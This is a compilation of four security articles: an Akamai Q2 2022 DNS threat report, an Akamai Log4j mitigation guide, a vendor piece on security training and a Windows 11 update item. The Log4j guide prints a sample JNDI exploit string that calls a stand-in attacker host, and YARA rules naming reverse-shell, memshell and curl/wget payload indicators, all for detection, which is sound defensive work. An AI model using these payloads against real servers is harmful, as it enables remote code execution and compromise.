Akamai’s Insights on DNS in Q2 2022

by Or Katz and Jim Black
Data analysis by Gal Kochner and Moshe Cohen

Executive summary

  • Akamai researchers have analyzed malicious DNS traffic from millions of devices to determine how corporate and personal devices are interacting with malicious domains, including phishing attacks, malware, ransomware, and command and control (C2).
  • Akamai researchers saw that 12.3% of devices used by home and corporate users communicated at least once with domains associated with malware or ransomware.
  • Of those potentially compromised devices, 63% communicated with malware- or ransomware-associated domains, 32% with phishing domains, and 5% with C2 domains.
  • Digging further into phishing attacks, researchers found that users of financial services and high tech are the most frequent targets of phishing campaigns, with 47% and 36% of the victims, respectively.
  • Consumer accounts are the most affected by phishing, with 80.7% of the attack campaigns.
  • Tracking 290 different phishing toolkits being reused in the wild, and counting the number of distinct days each kit was reused over Q2 2022, shows that 1.9% of the tracked kits were reactivated on at least 72 days. In addition, 49.6% of the kits were reused for at least five days, demonstrating how heavily these kits are recycled and how many users are at risk of being revictimized. This shows how realistic-looking and dangerous these kits can be, even to knowledgeable users.
  • The most used phishing toolkit in Q2 2022 (Kr3pto, a phishing campaign that targeted banking customers in the United Kingdom, which evades multi-factor authentication [MFA]) was hosted on more than 500 distinct domains.

Introduction

“It’s always DNS.” Although that is a bit of a tongue-in-cheek phrase in our industry, DNS can give us a lot of information about the threat landscape that exists today. By analyzing information from Akamai’s massive infrastructure, we are able to gain some significant insights on how the internet behaves. In this blog, we will explore these insights into traffic patterns, and how they affect people on the other end of the internet connection. 

Akamai traffic insights

Attacks by category

Based on Akamai’s range of visibility across different industries and geographies, we can see that 12.3% of protected devices attempted to reach out to domains associated with malware at least once during Q2 2022, indicating that these devices might have been compromised. On the phishing and C2 front, 6.2% of devices accessed phishing domains and 0.8% accessed C2-associated domains. Although these numbers may seem insignificant, the scale here is in the millions of devices. Considering that, along with the knowledge that C2 is the most malignant of threats, these numbers are not only significant, they're critical.
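To make this measurement concrete, here is a minimal sketch (not Akamai's pipeline) of how such percentages could be computed from per-device DNS logs checked against threat-intelligence domain feeds; every file name and format here is a hypothetical assumption.

import csv
from collections import defaultdict

def load_domains(path):
    # One domain per line in each hypothetical feed file
    with open(path) as f:
        return {line.strip().lower() for line in f if line.strip()}

feeds = {
    "malware": load_domains("malware_domains.txt"),
    "phishing": load_domains("phishing_domains.txt"),
    "c2": load_domains("c2_domains.txt"),
}

devices_hit = defaultdict(set)  # category -> device ids seen querying it
all_devices = set()

# Hypothetical log format: device_id,queried_domain
with open("dns_logs.csv") as f:
    for device_id, domain in csv.reader(f):
        all_devices.add(device_id)
        for category, domains in feeds.items():
            if domain.lower() in domains:
                devices_hit[category].add(device_id)

for category, devices in sorted(devices_hit.items()):
    print(f"{category}: {100 * len(devices) / len(all_devices):.1f}% of devices")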

Comparing 2022 Q2 results with 2022 Q1 results (Figure 1), we can see a minor increase in all categories in Q2. We attribute those increases to seasonal changes that are not associated with a significant change in the threat landscape.

Fig. 1: Devices exposed to threats — Q1 vs. Q2

In Figure 2, we can see that of the 12.3% potentially compromised devices, 63% were exposed to threats associated with malware activity, 32% with phishing, and 5% with C2. Access to malware-associated domains does not guarantee that these devices were actually compromised, but provides a strong indication of increased potential risk if the threat wasn’t properly mitigated. However, access to C2-associated domains indicates that the device is most likely compromised and is communicating with the C2 server. This can often explain why the incidence of C2 is lower when compared with malware numbers.

Fig. 2: Potentially compromised devices by category

Phishing attack campaigns 

By looking into the brands that are being abused and mimicked by phishing scams in Q2 2022, categorized by brand industry and number of victims, we can see that high tech and financial brands led with 36% and 47%, respectively (Figure 3). These leading phishing industry categories are consistent with Q1 2022 results, in which high tech and financial brands were the leading categories, with 32% and 31%, respectively. 

Fig. 3: Phishing victims and phishing campaigns by abused brands

Taking a different view of the phishing landscape and ranking targeted industries by the number of attack campaigns launched over Q2 2022, we can see that high tech and financial brands still lead, with 36% and 41%, respectively (Figure 3). The correlation between the leading targeted brands by number of attacks and by number of victims is evidence that threat actors' efforts and resources are, unfortunately, effectively achieving their desired outcome.

Akamai’s research does not have any visibility into the distribution channels used to deliver the monitored phishing attacks that led to victims clicking on a malicious link and ending up on the phishing landing page. Yet the strong correlation between different brand segments by number of attack campaigns and the number of victims seems to indicate that the volume of attacks is effective and leads to a similar trend in the number of victims. The correlation might also indicate that the distribution channels used have minimal effect on attack outcome, and it is all about the volume of attacks that lead to the desired success rates.

Taking a closer look at phishing attacks by categorization of attack campaigns (consumer- vs. business-targeted accounts), we can see that consumer attacks are dominant, accounting for 80.7% of the attack campaigns (Figure 4). This dominance is driven by the massive demand for compromised consumer accounts in dark markets, which are then used to launch fraud-related second-phase attacks. However, even with only 19.3% of the attack campaigns, attacks against business accounts should not be considered marginal, as these attacks are usually more targeted and have greater potential for significant damage. Attacks that target business accounts may lead to a company's network being compromised with malware or ransomware, or to confidential information being leaked. An attack that begins with an employee clicking a link in a phishing email can end with the business suffering significant financial and reputational damage.

Fig. 4: Phishing targeted accounts — consumers vs. business

Phishing toolkits 

Phishing is an extremely common attack vector that has been used for many years, and its potential impacts and risks are well known to most internet users. However, phishing is still a highly relevant and dangerous attack vector that affects thousands of people and businesses daily. Research conducted by Akamai explains some of the reasons for this phenomenon, focusing on phishing toolkits and their role in making phishing attacks effective and relevant.

Phishing toolkits enable the rapid and easy creation of fake websites that mimic known brands. They allow even non–technically gifted scammers to run phishing scams, and in many cases they are used to create distributed, large-scale attack campaigns. The low cost and availability of these toolkits explain the increasing number of phishing attacks seen in the past few years.

According to Akamai's research, which tracked 290 different phishing toolkits being used in the wild, 1.9% of the tracked kits were reused on at least 72 distinct days over Q2 2022 (Figure 5). Further, 49.6% of the kits were reused for at least five days, and looking across all the tracked kits, every one of them was reused on no fewer than three distinct days over Q2 2022.
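As a rough illustration of this counting methodology (a sketch, not Akamai's actual tooling), distinct active days per kit can be tallied from sighting records; the input format below is a hypothetical (kit_name, date) CSV.

import csv
from collections import defaultdict

days_seen = defaultdict(set)  # kit name -> set of dates observed

# Hypothetical format: kit_name,YYYY-MM-DD (one row per sighting)
with open("kit_sightings.csv") as f:
    for kit, day in csv.reader(f):
        days_seen[kit].add(day)

total = len(days_seen)
for threshold in (3, 5, 72):
    hits = sum(1 for days in days_seen.values() if len(days) >= threshold)
    print(f"kits reused on >= {threshold} distinct days: {100 * hits / total:.1f}%")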

Fig. 5: Phishing toolkits by number of reused days Q2 2022

These numbers, which show how heavily the observed phishing kits are reused, shed some light on the phishing threat landscape and the scale involved, which creates an overwhelming challenge for defenders. Behind the reuse of phishing kits are factories and economic forces that drive the phishing landscape. Those forces include developers who create phishing kits that mimic known brands, which are later sold or shared among threat actors and reused over and over again with very minimal effort.

Further analysis on the most reused kits in Q2 2022, counting the number of different domains used to deliver each kit, shows that the Kr3pto toolkit was the one most frequently used and was associated with more than 500 domains (Figure 6). The tracked kits are labeled by the name of the brand being abused or by a generic name representing the kit developer signature or kit functionality.

In the case of Kr3pto, the actor behind the phishing kit is a developer who builds and sells unique kits that target financial institutions and other brands. In some cases, these kits target financial firms in the United Kingdom, and they bypass MFA. This also shows that a phishing kit initially created more than three years ago can still be highly active, effective, and intensively used in the wild.

Fig. 6: Top 10 reused phishing toolkits

The phishing economy is growing, kits are becoming easier to develop and deploy, and the web is full of abandoned, ready-to-be-abused websites and vulnerable servers and services. Criminals capitalize on these weaknesses to establish a foothold that enables them to victimize thousands of people and businesses daily.

The growing industrial nature of phishing kit development and sales (in which new kits are developed and released within hours) and the clear split between creators and users means this threat isn’t going anywhere anytime soon. The threat posed by phishing factories isn’t just focused on the victims who risk having valuable accounts compromised and their personal information sold to criminals — phishing is also a threat to brands and their stakeholders.

The life span of a typical phishing domain is measured in hours, not days. Yet new techniques and developments by the phishing kit creators are expanding these life spans little by little, and it’s enough to keep the victims coming and the phishing economy moving. 

Summary

This type of research is necessary in the fight to keep our customers safer online. We will continue to monitor these threats and report on them to keep the industry informed.

The best way to stay up to date on this and other research pieces from the Akamai team is to follow Akamai Security Research on Twitter.

Source:
https://www.akamai.com/blog/security-research/q2-dns-akamai-insights

Mitigating Log4j Abuse Using Akamai Guardicore Segmentation

Executive summary

A critical remote code-execution vulnerability (CVE-2021-44228) has been publicly disclosed in Log4j, an open-source logging utility that’s used widely in applications, including many utilized by large enterprise organizations.

The vulnerability allows threat actors to exfiltrate information from, and execute malicious code on, systems running applications that utilize the library by manipulating log messages. There already are reports of servers performing internet-wide scans in attempts to locate vulnerable servers, and our threat intelligence teams are seeing attempts to exploit this vulnerability at alarming volumes. Log4j is incorporated into many popular frameworks and many Java applications, making the impact widespread.

Akamai Guardicore Segmentation is well positioned to address this vulnerability in different ways. It's highly recommended that organizations update Log4j to its latest version, 2.16.0. Due to the rapidly escalating nature of this vulnerability, Akamai teams will continue to develop and deploy mitigation measures in order to support our customers.

As a follow-up to Akamai's recent post, we wanted to provide more detail on how organizations can leverage Akamai Guardicore Segmentation features to help address Log4j exposure.

Log4j vulnerability: scope and impact

Log4j is a Java-based open-source logging library. On December 9, 2021, a critical vulnerability involving unauthenticated remote code execution (CVE-2021-44228) in Log4j was reported, causing concern due to how commonly Log4j is used. In addition to being used directly in a large multitude of applications, Log4j is also incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink.

Although Akamai first observed exploit attempts against the Log4j vulnerability on December 9, following the widespread publication of the incident, we are now seeing evidence suggesting it could have been around for months. Since widespread publication of the vulnerability, we have seen multiple variants seeking to exploit it, with attack traffic sustained at around 2M exploit requests per hour. The speed at which the variants are evolving is unprecedented.

A vulnerable machine allows a threat actor to remotely provide a set of commands that Log4j executes, giving the attacker the ability to run arbitrary commands inside the server. This can allow an attacker to compromise a vulnerable system, including systems that might be secured deep inside a network with no direct access to the internet.

Akamai's security teams have been monitoring attackers attempting to exploit Log4j in recent days. Beyond the increase in attempted exploitation, Akamai researchers are also seeing attackers use a multitude of tools and attack techniques to get vulnerable components to log malicious content in order to achieve remote code execution. This is indicative of how quickly threat actors move to exploit a new vulnerability: the worse the vulnerability, the quicker they act.
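For context, exploitation hinges on getting a lookup string such as ${jndi:ldap://attacker.example:1389/a} into a field that a vulnerable Log4j version logs and then resolves via JNDI. The deliberately naive scanning sketch below (an illustration, similar in spirit to the YARA rules reproduced later in this post) flags such payloads; note that it would miss the obfuscated variants those rules also cover.

import re

# Matches plain ${jndi:<scheme>:/ payloads; obfuscated forms like
# ${${lower:j}ndi:...} require additional rules (see the YARA section below).
JNDI_PATTERN = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):/",
    re.IGNORECASE,
)

sample = "GET /login User-Agent: ${jndi:ldap://attacker.example:1389/a}"
if JNDI_PATTERN.search(sample):
    print("possible Log4j exploitation attempt")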

Mitigating Log4j abuse using Akamai Guardicore Segmentation

Customers using Akamai Guardicore Segmentation can leverage its deep, process level visibility to identify vulnerable applications and potential security risks in the environment. They can then use it to enact precise control over network traffic in order to stop attempted attacks on vulnerable systems, without disruptions to normal business operations. 

Guardicore Hunt customers have their environments monitored and investigated continuously by a dedicated team of security researchers. Alerts on security risks and suggested mitigation steps are immediately sent.

If you’d like to hear more about Akamai Guardicore Segmentation, read more or contact us.

What’s under threat: identify vulnerable Java processes and Log4j abuse

In order to protect against potential Log4j abuse, it is necessary to first identify potentially exploitable processes. This requires deep visibility into network traffic at the process level, which is provided by the Reveal and Insight features of Akamai Guardicore Segmentation. Precise visibility into internet connections and traffic at the process level allows us to see clearly what mitigation steps need to be taken, and visibility tools with historical data are pivotal in helping to prevent disruption to business operations.

Identify internet-connected Java applications: using the Reveal Explore Map, create a map for the previous week and filter by Java applications (such as Tomcat, Elastic, Logstash) and by applications that have connections to/from the internet. Using this map, you can now see which assets are under potential threat. While this won't yet identify applications using Log4j, it can give you an idea of which machines to prioritize in your mitigation process.

Create a historical map to analyze normal communication patterns: using the Reveal Explore Map, create a historical map of previous weeks (excluding the time since Log4j was reported) to view and learn normal communication patterns. Use this information to identify legitimate communications and respond without disrupting the business. For example, a historical map might indicate which network connections exist under normal circumstances; those could be allowed, while other connections are blocked or alerted on. Additionally, compare and contrast with a more recent map to identify anomalies, as in the sketch below.
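Outside the UI, the same baseline-versus-recent comparison can be approximated with a simple set difference, assuming connection lists can be exported from both maps; the CSV format below is a hypothetical stand-in for such an export.

import csv

def load_edges(path):
    # Hypothetical export format: source,destination,port
    with open(path) as f:
        return {tuple(row) for row in csv.reader(f)}

baseline = load_edges("map_baseline.csv")  # weeks before Log4j was reported
recent = load_edges("map_recent.csv")      # the period since disclosure

for src, dst, port in sorted(recent - baseline):
    print(f"previously unseen connection: {src} -> {dst}:{port}")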

Identify applications vulnerable to Log4j abuse: use Query 1 (in the query section below) with Insight to identify assets that are running Java applications with Log4j JAR files in their directories. This query should return all Log4j packages in your environment, allowing you to assess and address any mitigation steps needed. To better prioritize exposed machines, cross-reference the information with the Reveal Explore Map described previously.

Note that this query identifies Log4j packages that exist in the Java process's current working directory or its subdirectories.
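The Insight query itself appears in the original post; as a loose single-host analogue of the same idea (a hypothetical sketch, not the Insight query), one could enumerate running Java processes and search each one's working directory tree for Log4j JARs:

import fnmatch
import os
import psutil  # third-party: pip install psutil

for proc in psutil.process_iter(["pid", "name"]):
    if "java" not in (proc.info["name"] or "").lower():
        continue
    try:
        cwd = proc.cwd()
    except (psutil.AccessDenied, psutil.NoSuchProcess):
        continue
    # Walk the process's working directory and its subdirectories
    for root, _dirs, files in os.walk(cwd):
        for jar in fnmatch.filter(files, "*log4j*.jar"):
            print(f"pid {proc.info['pid']}: {os.path.join(root, jar)}")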

Detect potential exploitation attempts in Linux logs: run an Insight query using a YARA signature rule (Query 2, provided below in the query section) to search for known Log4j IoCs in the logs of Linux machines. This can help you identify whether you've been attacked.

Note that a negative result does not necessarily mean no attack took place, as this is only one of many indicators.

Stopping the attack: using Guardicore Segmentation to block malicious IoCs and attack vectors

Once vulnerable applications have been identified, it is imperative to be able to take action. While patching is underway, Akamai Guardicore Segmentation offers a multitude of options for alerting on, stopping, and preventing potential attacks. Critically, a solution with detailed and precise control over network communication and traffic is required to surgically block or isolate attack vectors, with minimal to no disruption to normal business functions.

Automatically block IoCs with the Threat Intelligence Firewall (TIFW) and DNS Security: Akamai security teams are working around the clock to identify IPs and domains used for Log4j exploitation. Customers who have these features turned on can expect a constantly updated list of IoCs to be blocked, preventing Log4j from being used to download malicious payloads. Note that TIFW can be set to alert or block; please ensure it's configured correctly. DNS Security is available from V41 onwards. The IoCs are also available on the Guardicore Threat Intel Repository and Guardicore Reputation Service.

Fully quarantine compromised servers: if compromised machines are identified during your investigation, use Akamai Guardicore Segmentation to isolate attacked/vulnerable servers from the rest of your network. Leverage built-in templates to easily enable deployment of segmentation policy to mitigate attacks.

Block inbound and outbound traffic to vulnerable assets: as a precautionary measure, you may also choose to block traffic to all machines identified with an unpatched version of Log4j, until patching is completed. Using a historical map of network traffic can help you limit the impact on business operations.

Create block rules for outgoing traffic from Java applications to the internet: if necessary, all internet-connected Java applications revealed in previous steps can be blocked from accessing the internet, as an additional precaution, until patching is complete.

Search queries

Query 1: To identify assets that are running Java applications, which also have a Log4j JAR file under their directories, run the following Insight query:

This query identifies assets that are running Java applications, which also have a Log4j jar file under their directories.

Query 2: To detect potential exploitation attempts, run an Insight query using YARA signature rules (our thanks to Florian Roth, who published the original rules):

SELECT path, count FROM yara WHERE path LIKE '/var/log/%%' AND sigrule = "rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1 {
strings:
$xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
condition:
1 of them
}
rule EXPL_JNDI_Exploit_Patterns_Dec21_1 {
strings:
$ = {22 2F 42 61 73 69 63 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
$ = {22 2F 42 61 73 69 63 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 42 61 73 69 63 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 4A 65 74 74 79 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 57 65 62 6C 6F 67 69 63 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 4A 42 6F 73 73 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 57 65 62 73 70 68 65 72 65 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 55 52 4C 44 4E 53 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 31 2F 44 6E 73 6C 6F 67 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 32 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 42 65 61 6E 75 74 69 6C 73 31 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 4A 72 65 38 75 32 30 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 44 6E 73 6C 6F 67 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 47 72 6F 6F 76 79 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
$ = {22 2F 57 65 62 73 70 68 65 72 65 42 79 70 61 73 73 2F 55 70 6C 6F 61 64 2F 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1 {
strings:
$xa1 = {22 68 65 61 64 65 72 20 77 69 74 68 20 76 61 6C 75 65 20 6F 66 20 42 61 64 41 74 74 72 69 62 75 74 65 56 61 6C 75 65 45 78 63 65 70 74 69 6F 6E 3A 20 22}
$sa1 = {22 2E 6C 6F 67 34 6A 2E 63 6F 72 65 2E 6E 65 74 2E 4A 6E 64 69 4D 61 6E 61 67 65 72 2E 6C 6F 6F 6B 75 70 28 4A 6E 64 69 4D 61 6E 61 67 65 72 22}
$sa2 = {22 45 72 72 6F 72 20 6C 6F 6F 6B 69 6E 67 20 75 70 20 4A 4E 44 49 20 72 65 73 6F 75 72 63 65 22}
condition:
$xa1 or all of ($sa*)
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
strings:
$ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 72 6D 69 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 64 6E 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 69 69 6F 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 68 74 74 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6E 69 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6E 64 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 63 6F 72 62 61 3A 2F 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC {
strings:
$x1 = {22 24 25 37 42 6A 6E 64 69 3A 22}
$x2 = {22 25 32 35 32 34 25 32 35 37 42 6A 6E 64 69 22}
$x3 = {22 25 32 46 25 32 35 32 35 32 34 25 32 35 32 35 37 42 6A 6E 64 69 25 33 41 22}
$x4 = {22 24 7B 6A 6E 64 69 3A 24 7B 6C 6F 77 65 72 3A 22}
$x5 = {22 24 7B 3A 3A 2D 6A 7D 24 7B 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
strings:
$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
condition:
$x1 and not 1 of ($fp*)
}
rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
strings:
/* curl -s */
$sa1 = {22 59 33 56 79 62 43 41 74 63 79 22}
$sa2 = {22 4E 31 63 6D 77 67 4C 58 4D 67 22}
$sa3 = {22 6A 64 58 4A 73 49 43 31 7A 49 22}
/* |wget -q -O- */
$sb1 = {22 66 48 64 6E 5A 58 51 67 4C 58 45 67 4C 55 38 74 49 22}
$sb2 = {22 78 33 5A 32 56 30 49 43 31 78 49 43 31 50 4C 53 22}
$sb3 = {22 38 64 32 64 6C 64 43 41 74 63 53 41 74 54 79 30 67 22}
condition:
1 of ($sa*) and 1 of ($sb*)
}
rule SUSP_JDNIExploit_Indicators_Dec21 {
strings:
$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
condition:
filesize < 100MB and $xr1
}
rule SUSP_EXPL_OBFUSC_Dec21_1{
strings:
/* ${lower:X} - single character match */
$ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
/* ${upper:X} - single character match */
$ = { 24 7B 75 70 70 65 72 3A ?? 7D }
/* URL encoded lower - obfuscation in URL */
$ = {22 24 25 37 62 6C 6F 77 65 72 3A 22}
$ = {22 24 25 37 62 75 70 70 65 72 3A 22}
$ = {22 25 32 34 25 37 62 6A 6E 64 69 3A 22}
$ = {22 24 25 37 42 6C 6F 77 65 72 3A 22}
$ = {22 24 25 37 42 75 70 70 65 72 3A 22}
$ = {22 25 32 34 25 37 42 6A 6E 64 69 3A 22}
condition:
1 of them
}"
AND count > 0 AND path NOT LIKE "/var/log/gc%"

Source:
https://www.akamai.com/blog/security/recommendations-for-log4j-mitigation

5 Ways to Mitigate Your New Insider Threats in the Great Resignation

Companies are in the midst of an employee “turnover tsunami” with no signs of a slowdown. According to Fortune Magazine, 40% of U.S. workers are considering quitting their jobs. This trend, coined the Great Resignation, creates instability in organizations. High employee turnover increases security risks, leaving companies more vulnerable to attacks that exploit human factors worldwide.

Statistics presented at Davos 2022 connect the turmoil of the Great Resignation to the rise of new insider threats. Security teams are feeling the impact, and keeping up with employee security is harder than ever. Companies need a fresh approach to close the gaps and prevent attacks. This article will examine what your security teams must do within the new organizational dynamics to quickly and effectively address these unique challenges.

Handling Your New Insider Threats

Implementing a successful security awareness program is more challenging than ever for your security team: the new blood coming in causes cultural dissonance. Every new employee brings their own security habits, behaviors, and ways of working. Changing habits is slow, yet companies don't have the luxury of time. They must get ahead of hackers to prevent attacks from new insider threats.

Be sure to handle your organization's high-impact security risks:

  • Prevent data loss – When employees leave, there’s a high risk of sensitive data leaks. Manage off-boarding and close lurking dormant emails to prevent data loss.
  • Maintain best practices – When new employees join the organization, even if security training is well conducted, they’re not on par with their peers. Unknown security habits may put the organization at risk.
  • Ensure friendly reminders – With fewer staff, employees are overburdened and pressured. Security may be “forgotten” or neglected in the process.
  • Support remote work – To support rapid employee recruitment, working at home is a must. Remote work flexibility helps to attract and retain new employees.
  • Train on the go – Remote work requires securing remote devices and dealing with new employee behavior for inherent distractions – on the go and at home.

5 Preventive Measures for High Impact in Your Organization

Security teams must protect companies against new phishing attempts amid high workforce flux. Practical security training is key to countering hackers. New techniques and practices are required to support remote work and new behavioral challenges, especially during times of high employee turnover. To succeed, your training must keep cyber awareness fresh for all staff and genuinely transform the behavior of your new employees.

Here are five preventive measures to effectively protect your organization for cyber resilience:

Ensure all staff get continuous training

Security risks are constantly evolving and ever-present, and all employees are needed to protect against sophisticated phishing threats. It's even more complicated during the Great Resignation: new weak links put your company at greater risk, as gullible employees leave security ‘holes’ in your organization's front line. Security teams are well aware of the risks.

Research shows that companies must continuously train 100% of their staff every month. Yet, employees spend little time thinking about security.

Automated security awareness training like CybeReady makes it easier to manage security training for all your staff.

  • Instead of manual work, use new, in-depth BI data and reports to guide your training plan for new and experienced employees.
  • Adjust difficulty level to the role, geography, and risk, to flexibly control your diverse employee needs and vulnerabilities.
  • Raise employee awareness of threats.
  • Prevent hacker exploitation and emergency triage with company leadership.

Target new employees

Your security depends on employee help and cooperation. Build best practices on the job. Threat basics aren't enough to stop malicious actors. Whether in the office or working remotely, security training must foster mastery. Start with low difficulty, create a foundation, and continually promote learning to the next level. To be effective, you must understand and cater to your employees' needs and ways of working.

Simply sending out emails to employees is not enough for a robust learning experience. With security awareness platforms like CybeReady, training becomes more scientific for continuous, accurate analysis of your security awareness.

  • Adjust your training simulations to employee contexts and frequency for mastery.
  • Set difficulty level depending on employee behavior and results.
  • Use intensive, bite-size intervals for success.
  • Vary attack scenarios so new employees get proper onboarding.
  • Keep security top of mind for all your staff.

Prioritize your highest risk groups

For a cyber awareness training program to be successful, security teams must plan, operate, evaluate and adapt accordingly. Forecasting actual difficulty and targeting groups can be complex. Security teams must determine future attack campaigns based on employee behavior and address challenges in a given scenario.

With data-driven platforms like CybeReady, your security teams monitor campaign performance to fine-tune employee defense.

  • Build custom high-intensity training campaigns for your high-risk groups.
  • Focus on specific challenges for concrete results like:

1) Password and data requests

2) Messages from seemingly legitimate senders and sources

3) Realistic content tailored to a specific department or role.

  • Adapt your training for both individuals and attack vectors while respecting employee privacy.
  • Shift problematic group behavior to best practices.

Keep busy staff vigilant

Security is 24/7. Keep your training unpredictable to maintain employee vigilance. Send surprising simulation campaigns in a continuous cycle. Catch employees off guard for the best learning. To create high engagement, ensure your training content is relevant to daily actions. Use short, frequent, and intriguing content in their own language. Tailor to local references and current news.

With scientific, data-based simulations like CybeReady, companies mimic the rapidly changing attack environment – plus, tick all your compliance boxes for a complete solution. Stay abreast of evolving global phishing trends as they vary around the world. Focus all your employees on the attacker styles and scenarios most popular in their geographies and languages. Adjust frequency to personal and group risk.

Ensure long-term results for every employee

Take advantage of the ‘golden moment.’ Just-in-time learning is the key to the most effective results. Instead of random enforcement training that is often irrelevant to employees, make a lasting impression right when mistakes happen. Ensure that your training uses this limited window of time. People are likelier to remember the experience and change behavior the next time.

With data science-driven cyber security training platforms like CybeReady, security teams seize the moment of failure for long-term results. With just-in-time learning, employees immediately get training on mistakes made upon falling for a simulation. They retain critical knowledge and respond better in future attack scenarios. With a new awareness of risks, transform learning into new behaviors.

Cutting Your Security Risks with a New Level of Employee Awareness

In global organizations today, seamlessly integrating the latest security know-how into everyday work is a must to counter the new risks of the Great Resignation. It's more important than ever for every employee to quickly get up to speed for high cyber resilience.

Download the CybeReady Playbook to learn how CybeReady's fully automated security awareness training platform provides the fast, concrete results you need with virtually zero IT effort, or schedule a product demo with one of our experts.

Source:
https://thehackernews.com/2022/09/5-ways-to-mitigate-your-new-insider.html

Windows 11 KB5017328 update fixes USB printing, audio headset issues

Microsoft has released the Windows 11 KB5017328 cumulative update with security updates and improvements, including fixes for USB printing and Bluetooth headsets.

KB5017328 is a mandatory cumulative update containing the September 2022 Patch Tuesday security updates for vulnerabilities discovered in previous months.

Windows 11 KB5017328 cumulative update

Windows 11 users can install today's update by going to Start > Settings > Windows Update and clicking on ‘Check for Updates.’

Windows 11 users can also manually download and install the KB5017328 update from the Microsoft Update Catalog.

What’s new in the Windows 11 KB5017328 update

After installing today's update, Windows 11's build number changes to 22000.978.

The Windows 11 KB5017328 cumulative update includes approximately 25 improvements and fixes, with the highlighted fixes listed below:

  • USB printers that might have malfunctioned when you restarted your device or reinstalled them now work as expected.
  • Microsoft fixed a Windows 11 SE issue that displayed trust errors when attempting to install apps from the Microsoft Store.
  • Microsoft fixed an issue where Bluetooth audio headsets stopped playing audio after adjusting the progress bar.
  • Microsoft addressed a Microsoft Edge IE mode issue that prevented users from interacting with dialog boxes.
  • Microsoft fixed a bug that prevented Windows from displaying Microsoft account (MSA) login forms after installing the KB5016691 update.

In addition to these issues, Microsoft also fixed eighteen other bugs, as explained in the August KB5016691 preview update.

Source:
https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5017328-update-fixes-usb-printing-audio-headset-issues/

